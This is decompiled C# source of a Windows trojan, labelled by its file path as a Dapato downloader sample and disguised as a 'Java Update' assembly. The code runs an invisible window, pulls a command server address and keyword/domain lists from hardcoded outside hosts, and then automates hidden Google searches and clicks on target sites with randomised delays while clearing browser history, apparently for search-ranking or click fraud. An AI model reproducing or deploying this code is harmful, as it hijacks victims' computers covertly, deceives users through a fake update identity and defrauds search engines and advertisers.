// Decompiled with JetBrains decompiler // Type: browser_bastan.Form1 // Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe using System; using System.Collections.Generic; using System.ComponentModel; using System.Diagnostics; using System.Drawing; using System.Net; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; using System.Threading; using System.Windows.Forms; namespace browser_bastan { public sealed class Form1 : Form { private const int GWL_EXSTYLE = -20; private const int WS_EX_TOOLWINDOW = 128; private const int INTERNET_OPTION_END_BROWSER_SESSION = 42; private IContainer components; private WebBrowser webBrowser1; private string ana = "http://www.nurullahuzmez.com"; private string baba = "http://[DEGISTIR]/v/v.php"; private Queue> kelimelistesi = new Queue>(); private string kelime; private string domain; private int suankisayfa = 1; private Dictionary gezilenler = new Dictionary(); private Random rnd = new Random(); protected override void Dispose(bool disposing) { if (disposing && this.components != null) this.components.Dispose(); base.Dispose(disposing); } private void InitializeComponent() { this.webBrowser1 = new WebBrowser(); this.SuspendLayout(); this.webBrowser1.Dock = DockStyle.Fill; this.webBrowser1.IsWebBrowserContextMenuEnabled = false; this.webBrowser1.Location = new Point(0, 0); this.webBrowser1.Name = "webBrowser1"; this.webBrowser1.ScriptErrorsSuppressed = true; this.webBrowser1.Size = new Size(761, 488); this.webBrowser1.TabIndex = 0; this.webBrowser1.WebBrowserShortcutsEnabled = false; this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted); this.webBrowser1.NewWindow += new CancelEventHandler(this.webBrowser1_NewWindow); this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; this.ClientSize = new Size(761, 488); this.Controls.Add((Control) this.webBrowser1); this.Name = nameof (Form1); this.Opacity = 0.0; this.ShowIcon = false; this.ShowInTaskbar = false; this.StartPosition = FormStartPosition.CenterScreen; this.Load += new EventHandler(this.Form1_Load); this.ResumeLayout(false); } [DllImport("user32.dll")] public static extern bool SetForegroundWindow(IntPtr hWnd); [DllImport("user32.dll")] public static extern int SetWindowLong(IntPtr window, int index, int value); [DllImport("user32.dll")] public static extern int GetWindowLong(IntPtr window, int index); [DllImport("winmm.dll")] public static extern int sndPlaySound(string lpszSoundName, int uFlags); [DllImport("wininet.dll", SetLastError = true)] private static extern bool InternetSetOption( IntPtr hInternet, int dwOption, IntPtr lpBuffer, int lpdwBufferLength); public Form1() => this.InitializeComponent(); private void webBrowser1_NewWindow(object sender, CancelEventArgs e) => e.Cancel = true; private void Basla() { this.DeleteCache(); try { this.suankisayfa = 1; KeyValuePair keyValuePair = this.kelimelistesi.Dequeue(); this.kelime = keyValuePair.Key; this.domain = keyValuePair.Value; while (this.webBrowser1.IsBusy) Thread.SpinWait(10000); this.webBrowser1.Navigate("http://www.google.com.tr"); } catch (InvalidOperationException ex) { Environment.Exit(-1); } } private void KelimeleriCek() { using (WebClient webClient = new WebClient()) { string str1 = ""; try { str1 = webClient.DownloadString(this.baba); } catch (Exception ex) { Environment.Exit(-1); } string str2 = str1; char[] chArray = new char[1]{ '\n' }; foreach (string str3 in str2.Split(chArray)) { string[] strArray = str3.Trim().Split('|'); try { string key = strArray[1]; KeyValuePair keyValuePair = new KeyValuePair(strArray[0], key); this.gezilenler.Add(key, false); this.kelimelistesi.Enqueue(keyValuePair); } catch { } } } } private void BirineTikla() { if (!(this.webBrowser1.Document != (HtmlDocument) null)) return; foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input")) { if (htmlElement.GetAttribute("name").Contains("btnG") || htmlElement.GetAttribute("name").Contains("btnK")) { htmlElement.RaiseEvent("onmouseover"); htmlElement.RaiseEvent("onmousedown"); htmlElement.InvokeMember("click"); } } } private void ButonTikla(string attribute, string value) { if (!(this.webBrowser1.Document != (HtmlDocument) null)) return; foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input")) { if (htmlElement.GetAttribute(attribute).Contains(value)) { htmlElement.RaiseEvent("onmouseover"); htmlElement.RaiseEvent("onmousedown"); htmlElement.InvokeMember("click"); } } } private void ButonaTekrarTikla(string attribute, string value) { if (!(this.webBrowser1.Document != (HtmlDocument) null)) return; foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("button")) { if (htmlElement.GetAttribute(attribute).Contains(value)) { htmlElement.RaiseEvent("onmouseover"); htmlElement.RaiseEvent("onmousedown"); htmlElement.InvokeMember("click"); } } } private void webBrowser1_DocumentCompleted( object sender, WebBrowserDocumentCompletedEventArgs e) { string str = e.Url.ToString(); if (str == "http://www.google.com.tr/") this.SureliIslet((Form1.SureliFonksiyon) (() => { this.TextBoxYaz("name", "q", this.kelime); this.SureliIslet(new Form1.SureliFonksiyon(this.SubmitForm), 4000, 5000); }), 2000, 4000); else if (str.StartsWith("http://www.google.com.tr") && str.Contains("hl=tr")) { int suankisayfa = this.suankisayfa; this.SureliIslet((Form1.SureliFonksiyon) (() => { if (this.LinkeTikla(this.domain)) return; this.SureliIslet(new Form1.SureliFonksiyon(this.Ilerle), 5000, 12000); }), 3000, 6000); } else { if (!str.Contains(this.domain) || str.StartsWith("http://www.google.com")) return; this.SureliIslet((Form1.SureliFonksiyon) (() => { if (this.gezilenler[this.domain]) return; this.gezilenler[this.domain] = true; this.RastGeleGez(); }), 20000, 50000); } } private void SubmitForm() { if (!(this.webBrowser1.Document != (HtmlDocument) null)) return; foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("Form")) htmlElement.InvokeMember("submit"); } private void Ilerle() { ++this.suankisayfa; foreach (HtmlElement link in this.webBrowser1.Document.Links) { if (link.OuterText == this.suankisayfa.ToString() || link.OuterText == this.suankisayfa.ToString() + " ") { link.RaiseEvent("onmouseover"); link.RaiseEvent("onmousedown"); link.InvokeMember("click"); } } } private void RastGeleGez() { if (!(this.webBrowser1.Document != (HtmlDocument) null)) return; HtmlElementCollection elementsByTagName = this.webBrowser1.Document.GetElementsByTagName("a"); List htmlElementList = new List(elementsByTagName.Count); if (elementsByTagName.Count > 0) { foreach (HtmlElement htmlElement in elementsByTagName) { if (htmlElement.GetAttribute("target") != "_blank" && !string.IsNullOrEmpty(htmlElement.InnerText) && this.NormalLink(htmlElement.GetAttribute("href"))) htmlElementList.Add(htmlElement); } if (htmlElementList.Count > 0) { htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmouseover"); htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmousedown"); htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].InvokeMember("click"); htmlElementList.Clear(); } } this.SureliIslet((Form1.SureliFonksiyon) (() => this.SureliIslet(new Form1.SureliFonksiyon(this.Basla), 240001, 241000)), 5000, 6000); } private bool NormalLink(string url) => !url.EndsWith("xml") && !url.EndsWith("@") && !url.EndsWith("SetHomePage") && !url.EndsWith("AddFavorite") && !url.EndsWith(".jpg") && !url.EndsWith(".gif") && !url.EndsWith(".png") && !url.EndsWith(".rar") && !url.EndsWith(".zip") && !url.EndsWith(".vcf") && !url.EndsWith(".exe") && !url.EndsWith(".mp3") && !url.EndsWith(".mp4") && !url.EndsWith("mailto"); private void DeleteCache() { Process.Start(new ProcessStartInfo() { FileName = "RunDll32.exe", Arguments = "InetCpl.cpl,ClearMyTracksByProcess 1" }).WaitForExit(); Process.Start(new ProcessStartInfo() { FileName = "RunDll32.exe", Arguments = "InetCpl.cpl,ClearMyTracksByProcess 8" }).WaitForExit(); Form1.InternetSetOption(IntPtr.Zero, 42, IntPtr.Zero, 0); } private void TextBoxYaz(string att, string attname, string attvalue) { if (!(this.webBrowser1.Document != (HtmlDocument) null)) return; foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input")) { if (htmlElement.GetAttribute(att).Equals(attname)) htmlElement.SetAttribute("value", attvalue); } } private bool LinkeTikla(string url) { bool flag = false; List stringList = new List(); if (this.webBrowser1.Document != (HtmlDocument) null) { foreach (HtmlElement link in this.webBrowser1.Document.Links) { string attribute = link.GetAttribute("href"); stringList.Add(attribute); if (!attribute.Contains("//webcache.googleusercontent.com") && !attribute.Contains("&q=related:") && link.GetAttribute("href").Contains(url)) { link.RaiseEvent("onmouseover"); link.RaiseEvent("onmousedown"); link.InvokeMember("Click"); flag = true; break; } } } return flag; } private void SureliIslet(Form1.SureliFonksiyon x, int min, int max) { System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer() { Interval = this.rnd.Next(min, max) }; timer.Tick += (EventHandler) ((s, ev) => { x(); ((System.Windows.Forms.Timer) s).Stop(); ((Component) s).Dispose(); }); timer.Start(); } private void PanelAyarla() { string newValue = ""; WebHeaderCollection headerCollection1 = new WebHeaderCollection(); headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)"); WebHeaderCollection headerCollection2 = headerCollection1; using (WebClient webClient = new WebClient() { Encoding = Encoding.Default, Headers = headerCollection2 }) { try { newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString(); } catch (Exception ex) { Environment.Exit(-1); } } this.baba = this.baba.Replace("[DEGISTIR]", newValue); } private void Form1_Load(object sender, EventArgs e) { this.Size = new Size(this.rnd.Next(1024, 1366), this.rnd.Next(768, 768)); Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128); this.ieKontrol(); this.PanelAyarla(); this.KelimeleriCek(); Araclar.DisableClickSounds(); this.Basla(); } private void ieKontrol() { if (new WebBrowser().Version.Major < 7) Environment.Exit(-1); } private delegate void SureliFonksiyon(); } }